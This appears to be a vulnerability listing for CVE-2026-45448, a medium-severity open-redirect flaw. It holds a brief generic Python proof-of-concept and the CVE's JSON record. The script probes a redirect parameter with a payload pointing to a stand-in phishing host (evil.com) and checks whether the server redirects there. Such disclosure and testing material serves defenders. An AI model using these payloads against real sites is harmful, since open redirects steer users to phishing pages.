CVE-2026-45448

import requests target_url = "http://example.com/redirect" malicious_payload = "http://evil.com/phishing" # Sending a GET request with the malicious redirect parameter params = { "url": malicious_payload # Common parameter name, might vary } response = requests.get(target_url, params=params, allow_redirects=False) # Check if the server responds with a 302/301 Redirect if response.status_code in [301, 302, 303, 307, 308]: if "evil.com" in response.headers.get('Location', ''): print(f"[+] Vulnerability Confirmed! Redirecting to: {response.headers['Location']}") else: print("[-] Redirect occurred, but not to the malicious payload.") else: print("[-] No redirect detected.")

{"cve": {"id": "CVE-2026-45448", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:23.640", "lastModified": "2026-05-14T18:24:08.747", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "CWE-601 URL redirection to untrusted site ('open redirect')"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0", "source": "[email protected]"}]}}